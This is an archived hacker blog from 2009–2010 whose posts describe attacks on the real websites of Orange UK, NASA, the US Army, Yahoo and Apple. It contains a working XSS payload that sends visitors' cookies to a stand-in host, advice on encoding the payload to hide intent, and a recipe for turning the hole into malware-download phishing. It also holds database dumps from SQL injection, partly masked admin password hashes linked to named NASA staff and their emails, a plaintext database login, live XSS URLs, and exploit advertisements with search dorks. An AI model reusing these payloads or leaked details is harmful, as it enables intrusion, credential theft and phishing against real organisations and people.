Orange.co.uk Vulnerable to XSS and phishing

January 29th, 2010 TinKode

                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania

XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…

More here: [ XSS ]

I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.

Proof of Concept:

Link:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email="><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

c0de:

"><iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")></iframe>

We can encode the malicous code in base64, hex, etc in order to hide our intentions!

Another example for this vulnerability is phishing!

As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.

I picked a executable program (winamp in our case) for a demonstration.

Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe

The malicious code:

"><iframe height="0" width="0" frameborder="0" src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe"></iframe>

Encoded in hex will become:

http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email=%22%3e%3c%69%66%72%61%6d%65%20%68%65%69%67%68%74%3d%22%30%22%20%77%69%64%74%68%3d%22%30%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%77%6e%6c%6f%61%64%2e%6e%75%6c%6c%73%6f%66%74%2e%63%6f%6d%2f%77%69%6e%61%6d%70%2f%63%6c%69%65%6e%74%2f%77%69%6e%61%6d%70%35%35%37%32%5f%6c%69%74%65%5f%65%6e%2d%75%73%2e%65%78%65%22%3e%3c%2f%69%66%72%61%6d%65%3e

Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.

Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

Posted in Other | 4 Comments »

IPB Full Disclosure Exploit [Python]

January 24th, 2010 TinKode

#! /usr/bin/env python3.1

################################################################
# 	         _____ _____  ____  (validator.php)            #
#	        |_   _|  __ \|  _ \                            #
#		  | | | |__) | |_) |                           #
# 		  | | |  ___/|  _ <                            #
# 	 	 _| |_| |    | |_) |                           #
#   		|_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################

Link: http://codepad.org/8tKot0Cr

You must have python 3.1 to work!

Posted in Other | 12 Comments »

The Center for Aerosol Research NASA website security issues

January 22nd, 2010 TinKode

				 _   _           _____
				| \ | |   /\    / ____|  /\
				|  \| |  /  \  | (___   /  \
				| . ` | / /\ \  \___ \ / /\ \
				| |\  |/ ____ \ ____) / ____ \
				|_| \_/_/    \_\_____/_/    \_\
						#TinKode@Romania

            The Center for Aerosol Research at NASA's Goddard Space Flight Center

                                    

The Goddard Space Flight Center (GSFC) is a major NASA space research laboratory established on May 1, 1959 as NASA’s first space flight center. GSFC employs approximately 10,000 civil servants and contractors, and is located approximately 6.5 miles (10.5 km) northeast of Washington, D.C. in Greenbelt, Maryland, USA. GSFC, one of ten major NASA field centers, is named in recognition of Dr. Robert H. Goddard (1882-1945), the pioneer of modern rocket propulsion in the United States.

Vulnerable website: http://aerocenter.gsfc.nasa.gov

I want to say that it was very hard to make this injection…
The webserver had good protection but wasn’t fully secured.
This kind only works manually , you can’t do it with apps.

In this picture you can see the visible columns:

Main informations:

#Version:5.0.82-log
#User:carwww@localhost
#Database:aerocenter
#Datadir:/var/mysql/

Here we can see all databases:

[1] information_schema
[2] aerocenter
[3] car
[4] test

In this screenshot are all tables from all databases:

I don’t know exactly from which database are the tables… so I think I have not split them very well

Tables from “aerocenter” database:

[1] files
[2] milagro_users
[3] modis_wshop
[4] news
[5] news_files
[6] personnel
[7] siteupdate
[8] test
[9] users
[10] workshop_files
[11] yoram2007
[12] yoram2007_agenda

Tables from “car” database:

[1] car_content
[2] car_data_info
[3] car_data_missions
[4] car_data_overview
[5] car_data_quicklooks
[6] car_files
[7] car_homefeature
[8] car_homefeature_title
[9] car_homeimage
[10] car_homemission
[11] car_images
[12] car_news
[13] car_news_files
[14] car_pers_ordering
[15] car_personal_pages
[16] car_personnel
[17] car_publications,
[18] car_publications_authors
[19] car_publications_coauthors
[20] car_sections
[21] car_siteupdate
[22] car_subsections
[23] car_users

Tables from “test” database:

[1] content
[2] homeimage
[3] hometext
[4] images
[5] news
[6] news_files
[7] personnel
[8] publications
[9] publications_authors
[10] publications_coauthors
[11] sections
[12] siteupdate
[13] subsections
[14] users

Columns from all databases:

Here we have the same situation like with tables…

[1] filename
[2] title
[3] user
[4] actualname
[5] firstname
[6] lastname
[7] username
[8] userpassword
[9] userlevel
[10] status
[11] email
[12] phone
[13] affiliation
[14] focusgroup
[15] flag
[16] date_entered
[17] event_date
[18] time
[19] location
[20] art_title
[21] talk_title
[22] art_content
[23] article_id
[24] rank
[25] cal_lastname
[26] cal_firstname
[27] cal_middlename
[28] cal_email
[29] fax
[30] su_content
[31] last_updated
[32] badge
[33] citizen
[34] country
[35] content
[36] ordering
[37] section_title
[38] subsection_title
[39] header
[40] link_text_before
[41] linked_text
[42] link_url
[43] link_text_after
[44] html
[45] mission_id
[46] flight_number
[47] date
[48] time_flight
[49] time_data
[50] aircraft_type
[51] flight_scientist
[52] lat_long
[53] flight_map_lg
[54] modis_img_lg
[55] goes_img
[56] details
[57] flight_schedule
[58] anim_img_type
[59] static_img_type
[60] modis_credit
[61] flight_track_credit
[62] quicklook_credit
[63] details_credit
[64] modis_anim
[65] modis_aqua
[66] modis_terra
[67] goes_utc
[68] kmz_file
[69] mission_name
[70] year
[71] objective
[72] logo
[73] logo_width
[74] logo_height
[75] table_number
[76] data
[77] flight_num
[78] img_sm
[79] img_lg
[80] content_id
[81] image
[82] image_alt
[83] image_align
[84] active
[85] feature_title
[86] image_caption
[87] image_large
[88] id_ordering
[89] order_id
[90] page_id
[91] pers_id
[92] middlename
[93] profile_active
[94] profile_img
[95] class
[96] onlinestatus
[97] classification
[98] monthdays
[99] found_in
[101] eds
[102] publication
[103] volume
[104] issue
[105] pages
[106] pub_id
[107] author
[108] lab_member_auth
[109] coauthors
[110] lab_member_coauth
[111] sectionTitile
[112] parentSection
[113] cal_login
[114] cal_passwd
[115] profile
[116] profile_img1
[117] profile_img2

Admins accounts:

ghalusa:af2bb*******8418dfce03f4219318dc:ghalusa@climate.gsfc.nasa.gov
milagro:658ca4343e0f1c5************0be96:ghalusa@climate.gsfc.nasa.gov
ghalusa:ee79e81bd97d302baa934eb571c*****:Goran.N.Halusa@gsfc.nasa.gov
kleidman:34a9dbef02e31e86d1b71f6662c*****:Richard.Kleidman@nasa.gov
lremer:6b5376c7041eae26695ec259aa*****1:Lorraine.A.Remer@nasa.gov
paul:dc91e3f3529e02ff313dcaf49ce*****:paul.d.przyborski@nasa.gov
levy:e3321fb629d312948e9642f95df*****:Robert.C.Levy@nasa.gov

These hashes are md5() and they can be easily cracked.
Bye, TinKode!

Posted in MySQL Injection | 27 Comments »

vBulletin files / directories full disclosure (nulled)

January 20th, 2010 TinKode

*\-----------------------------------------------------------------------------/*
		       ____        _ _      _   _       (nulled)
		      |  _ \      | | |    | | (_)
		__   _| |_) |_   _| | | ___| |_ _ _ __
		\ \ / /  _ <| | | | | |/ _ \ __| | '_ \
		 \ V /| |_) | |_| | | |  __/ |_| | | | |
		  \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|
		                  Full disclosure... 

*\-----------------------------------------------------------------------------/* 

Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode
Date: 19-01-2010
Dork: "inurl:validator.php" 

*\-----------------------------------------------------------------------------/* 

Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything)
/ directories from the folder with vBulletin installed... 

*\-----------------------------------------------------------------------------/* 

Exploit: http://www.website.com/vB_forum/validator.php 

*\-----------------------------------------------------------------------------/* 

Note: Work on many nulled versions (maybe all) 

*\-----------------------------------------------------------------------------/* 

Copyrights: http://tinkode.baywords.com 

*\-----------------------------------------------------------------------------/* 

Greetz: http://www.insecurity.ro, http://www.darkc0de.com 

*\-----------------------------------------------------------------------------/*

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################ 

Link: http://codepad.org/pEBTI2dU

You need python 3.1 to work!

Posted in Other | 8 Comments »

US Army full disclosure again MSSQL injection

January 15th, 2010 TinKode

                                                                         _
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/
                                              #full disclosure@c0de.breaker

#Informations:
First Army was established on August 10, 1918 as a field army when sufficient American military manpower had arrived in France during World War I. As an element of the American Expeditionary Force (AEF) in the latter stages of World War I it was the first of three field armies established under the AEF. Serving in its ranks were many figures who later played important roles in World War II. First Army was inactivated in April 1919.

Few time ago I found a website vulnerable to MSSQL Injection (www.onestop.army.mil)… But today I tested another website, and in 2 minutes i found a vulnerable parameter.
Vulnerable link: www.first.army.mil

Testing:
and 1=1– (True)

and 1=2– (False)

Main Informations:

#Version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
#User: Vacancyuser
#Principal Database: FirstArmyVacancies
#Server Name: GILL011C2PSQL02
#Server: Microsoft-IIS/6.0

Version:

All databases from webserver:

[1] FirstArmyVacancies
[2] master
[3] tempdb
[4] model
[5] msdb
[6] ReportServer
[7] ReportServerTempDB
[8] gis_production
[9] 1st_Army_East
[10] FirstArmy_ATLevel_Training
[11] BESMgmt3
[12] 68W
[13] FirstArmy_Common
[14] G5MOB
[15] SpotlightManagementFramework
[16] HQ_Apps
[17] SurgeonsCTT
[18] TrainingOperationsPlanner
[19] UnitMilestone
[20] WheelsUpDown
[21] GFI
[22] CommandersTrainingTool
[23] NetPerfMon
[24] fsweb

Tables from “fsweb” database:

[1] Categories
[2] BuddyList
[3] ApptTypes
[4] DistanceList
[5] AppointmentBook_Properties
[6] AppointmentBook_Locations
[7] Appointmentbook_Holidays
[8] AppointmentBook
[9] AliasChart
[10] Abreviations
[11] UserActivityLog
[12] websafeFONTS
[13] PortalPageContent
[14] ValidFileTypes
[15] VerificationQuestions
[16] websafeFontSize
[17] Ziplist
[18] TimeSchedule
[19] POC
[20] SystemClearance
[21] CELL_CONFTABLE
[22] Messages
[23] States
[24] PortalPageData
[25] portalMENUS
[26] PortalGroups

Columns from table_name “POC”

[1] UserName
[2] ClientID
[3] PortalWebsite
[4] Prefix
[5] FirstName
[6] MiddleName
[7] LastName
[8] Suffix
[9] Email
[10] regEmail
[11] Expertise
[12] Fax
[13] City
[14] State
[15] Zip
[16] DisplayZip
[16] Address1
[17] Address2
[18] Phone
[19] Cell
[20] Author
[21] Password
[22] ClearanceLevel
[23] Notes
[24] BranchofService
[25] Ext
[26] RegistrationNumber
[27] LastLogin
[28] FailedLogins
[29] ActiveLogins
[30] VerificationQuestion1
[31] VerificationResponse1
[32] VerificationQuestion2

I want to say, i didn’t extract anything from any database like username,passwords,adresses,etc

Posted in MSSQL Injection | 4 Comments »

Army.mil full disclosure

January 7th, 2010 TinKode

                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/                 

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.

Vulnerable link: http://onestop.army.mil

This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.

Testing:
and 1=1– (True)

and 1=2– (False)

Ok, in this picture we can see all main informations about webserver.

Main information:

#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#User: Dynatouch
#Database: AHOS
#Host Name: AHSGSVDAHQIT130

All databases:

[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES

We can access information_schema, so let’s see the tables from principal database “AHOS”

[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items

Now, here are some interesting tables, like mgr_login_passwords.

Here i found user : password columns, with :

#Username: Dynatouch
#Password: AHOS

wtf!

That it’s all! Bye, TinKode…

Posted in Blind SQL Injection | 11 Comments »

Yahoo Blind SQL Injection

January 1st, 2010 TinKode

__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania

Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.

Vulnerable website: http://hk.adspecs.yahoo.com

Testing…

and 1=1– (True)

and 1=2– (False)

In this picture we can see as SELECT work

Now we try to find the version:

#Version: 5.0.11.24

Ok, it’s normal until now, but we can have access to mysql.user (bad)

And some tables from mysql.user (default)

MySQL Database, Table: user
#user
#password

~TinKode

Posted in Blind SQL Injection | 13 Comments »

How to find XSS in NASA

December 29th, 2009 TinKode

__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\

#How to find XSS in NASA?

Verry simple. What you have to do, is only to type on google, inurl:”tinkode”, and that it’s all.

Link google:

http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=inurl:%22tinkode%22&start=40&sa=N

Link Nasa XSS:

http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%3E%3Cscript%3Ealert%28/TinKode/%29%3C/script%3E

Yeah, this XSS is indexed on google, LOL.

Another XSS in NASA:

1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%22%3E%3Cscript%3Ealert(/c0de.breaker/)%3C/script%3E

4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=1%3Cscript%3Ealert(document.cookie)%3C/script%3E

5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=”>alert(/c0de.breaker/)

6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=alert(document.cookie)

etc

Posted in Other | No Comments »

Apple.com Blind SQL Injection – TinKode

December 27th, 2009 TinKode

          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
		#BlindSQLi by TinKode

@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.

Yeah, so it’s a huge company, but have a low security. Sad.
This parameter can be found by anyone in only 5 min with google.

Testing:

and 1=1– (True)

and 1=2– (false, and redirect)

Now let’s see the version

#Version: 5
#Databases: locator_asia, test

#Tables from “locator_asia” database

[0]: reseller_city_utf8
[1]: reseller_district_utf8
[2]: reseller_provice_utf8
[3]: resellers_cn_utf8
[4]: resellers_company_utf8
[5]: resellers_emaillog
[6]: resellers_hk
[7]: resellers_hk_area
[8]: resellers_hk_district
[9]: resellers_id
[10]: resellers_id_area
[11]: resellers_id_district
[12]: resellers_kr
[13]: resellers_kr_area
[14]: resellers_kr_district
[15]: resellers_mo
[16]: resellers_mo_area
[17]: resellers_mo_district
[18]: resellers_my
[19]: resellers_my_area
[20]: resellers_my_district
[21]: resellers_ph
[22]: resellers_ph_area
[23]: resellers_ph_district
[24]: resellers_sg
[25]: resellers_sg_area
[26]: resellers_sg_company
[27]: resellers_th
[28]: resellers_th_area
[29]: resellers_th_district
[30]: resellers_tw
[31]: resellers_tw_area
[32]: resellers_tw_district
[33]: resellers_type
[34]: resellers_vn
[35]: resellers_vn_area
[36]: resellers_vn_district
[37]: sms_black_list
[38]: sms_log
[39]: sms_user_action_log

#Tables from “test” database

[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp

Columns from “reseller_city_utf8” table

[0]: id
[1]: provice_id
[2]: city
[3]: city_spell
[4]: municipality_flag
[5]: near1
[6]: near2
[7]: near3
[8]: near4

A good thing is that there is nothing important to extract…
Great, good bye, TinKode

Posted in Blind SQL Injection | 7 Comments »

Nasa vulnerable to MSSQL Injection

December 13th, 2009 TinKode

 _   _                   __  __  _____ _____  ____  _      _
| \ | |                 |  \/  |/ ____/ ____|/ __ \| |    (_)
|  \| | __ _ ___  __ _  | \  / | (___| (___ | |  | | |     _
| . ` |/ _` / __|/ _` | | |\/| |\___ \\___ \| |  | | |    | |
| |\  | (_| \__ \ (_| | | |  | |____) |___) | |__| | |____| |
|_| \_|\__,_|___/\__,_| |_|  |_|_____/_____/ \___\_\______|_|

			#Nasa vulnerable again (MSSQLi)@c0de.breaker

Hello, unfortunately I found another serious vulnerability in NASA, more precisely a MSSQL Injection .
I admit that, this time it was harder to make the injection.
It is the forth time this happens, but nothing can surprise me anymore. As always, I showed no interest in the content of the website.
I hope this is the last time I see these kinds of vulnerabilities.
Link: www.gltrs.grc.nasa.gov
Testing:

and 1=1– (True)

and 1=2– (False)

As you can see, this time I didn’t hide the vulnerable parameter, mainly because it can be easily found on google with filetype:aspx.

Main Informations:

#Version: Microsoft SQL Server
#Operating system: Windows
#Web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.7
#Main Database: RDP
#Current User: RDP_Ext_RA

Tables from main database “RDP”:

#Abstract
#Author
#AuthorTypeLookup
#RDPLibrary
#RDPTemp
#ReportTemplateLookup
#ReportTypeLookup
#RptTempDistLookup
#RDP

All databases (92):

#AdventureWorks
#AppSecAdmin
#COD
#CODAppsAdmin
#CODSecurity
#Cont_999
#ContractMgmt
#CopierMDSTool
#CostRecovery
#DivAppSec
#DivisionInfo
#DivSurveys
#dnn-ltid
#dnn-metrology
#Eform
#EventSentry
#EventSentry_ext
#EventSentry_int
#FoodServices
#FormsMgmt
#FurnitureInventory
#Grants
#GRCHistory
#InstPool
#ITC
#ITCImagenet
#ITSInfo
#ITSProjectMgmt
#Library
#LibraryPatronReq
#Logistics
#LTIDLookup
#LTOCSecurity
#LVSS
#master
#metafldr
#Metcal
#Moc1Archives
#model
#msdb
#MTS
#nasath
#Northwind
#NPTRegistration
#PDOInventory
#Phone
#Projects
#PTF-HST-GHC
#PTF-HST-PSL
#PTF-ITC-AWT
#PTF-ITC-C_Archive
#PTF-ITC-CM_Archive
#PTF-ITC-Constellation
#PTF-ITC-Facilities
#PTF-ITC-ITC2_Rotocraft
#PTF-ITC-ITC4_GAGroundIcing
#PTF-ITC-ITC6_MarketingProject
#PTF-ITC-ITC0_CEV_Model
#PTF-ITC-NPTAssets
#PTF-ITC-Ohio_VIP
#PTF-ITC-Orion
#PTF-ITC-PBRF_RFP
#PTF-ITC-Template
#Publishing
#pubs
#pwots
#RDP
#RecordsMgmt
#ReportServer
#ReportServerTempDB
#RetireeReg
#RollCall
#ServerAdmin
#ServReqMgmt
#Sharepoint
#SPS
#SupplyMgmt
#tempdb
#TIALSPurchasing
#TMP2_MTS
#VTWinNASA
#WorkMgmt
#WSS-BRehab
#WSS-custodialservices
#WSS-ITC-MTPV
#WSS-ITS
#WSS-LTID
#WSS-LTIDWebAdmin
#WSS-PubsMgmt
#WSS-TIALS
#WSS-TIALSExecRpts
#WSS-webredesign

As a last remark:
I hope my findings aren’t all for nothing, and that NASA will do a complete inspection on all their websites.

Posted in MSSQL Injection | 5 Comments »